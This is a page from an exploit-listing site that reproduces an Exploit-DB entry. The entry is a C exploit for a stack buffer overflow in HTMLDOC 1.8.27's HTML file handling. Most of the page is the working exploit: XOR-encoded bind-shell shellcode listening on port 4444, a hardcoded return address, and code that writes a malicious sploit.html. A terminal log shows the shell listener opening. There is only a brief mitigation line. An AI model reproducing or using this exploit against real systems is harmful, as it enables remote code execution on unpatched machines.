header-logo
Suggest Exploit
vendor:
HTMLDOC
by:
ANTHRAX666 and Pankaj Kohli
7.5
CVSS
HIGH
Remote Stack Buffer Overflow
119
CWE
Product Name: HTMLDOC
Affected Version From: 1.8.27
Affected Version To: 1.8.27
Patch Exists: YES
Related CWE: N/A
CPE: a:htmldoc:htmldoc
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

HTMLDOC ‘html’ File Handling Remote Stack Buffer Overflow Exploit (Linux)

This exploit is for HTMLDOC 1.8.27 on Debian 5.0 (+ASLR). It is a remote stack buffer overflow exploit which creates a buffer of 512 bytes and then appends the shellcode to it. The shellcode is XOR encoded and binds a port 4444. The exploit is written in C language and is coded by Pankaj Kohli. The exploit file is written to sploit.html and is run as htmldoc -f somefile.pdf sploit.html.

Mitigation:

The user should update to the latest version of HTMLDOC and should also use a firewall to block port 4444.
Source

Exploit-DB raw data:

/*

HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux)
Reference: https://www.securityfocus.com/bid/35727

Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR)
Credit: ANTHRAX666 for finding the vulnerability

Coded by Pankaj Kohli
http://www.pank4j.com

pankaj@zion:~/test/htmldoc$ cat /proc/sys/kernel/randomize_va_space
2
pankaj@zion:~/test/htmldoc$ gcc htmldocb0f.c -o htmldocb0f
pankaj@zion:~/test/htmldoc$ ./htmldocb0f

[*] Creating buffer
[*] Exploit file written to sploit.html
Run as: htmldoc -f somefile.pdf sploit.html

pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
pankaj@zion:~/test/htmldoc$ ./htmldoc-1.8.27/htmldoc/htmldoc -f abc.pdf sploit.html &
[1] 3287
pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN

*/

#include <stdio.h>
#include <string.h>


/* Port binding (xor encoded) shellcode (port 4444) */
char code[] =
"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34"
"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05"
"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f"
"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff"
"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f"
"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f"
"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e"
"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff"
"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c"
"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21"
"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d"
"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78"
"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff"
"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5"
"\xd3\x9e";

long jmp = 0x0804d938;  // push esp; ret 0x0807;  ;-) 

int main(int argc, char **argv, char **envp) {
	char buff[512];
	int i;
	FILE *fd;

	printf("\n[*] Creating buffer\n");
        strcpy(buff, "<!-- MEDIA SIZE 1x1");
        for(i=0; i<275; i++) {
                buff[19+i] = 'A';
        }

	buff[294] = jmp & 0x000000ff;
	buff[295] = (jmp & 0x0000ff00) >> 8;
	buff[296] = (jmp & 0x00ff0000) >> 16;
	buff[297] = (jmp & 0xff000000) >> 24;
	buff[298] = 0;

	strcat(buff, code);

	fd = fopen("sploit.html", "wb");
	fprintf(fd, "%s", buff);
	fclose(fd);
	printf("[*] Exploit file written to sploit.html\n");
	printf("Run as: htmldoc -f somefile.pdf sploit.html\n\n");

	return 0;
}

// milw0rm.com [2009-09-09]

Navigation

Suggest Exploit

Services By CQR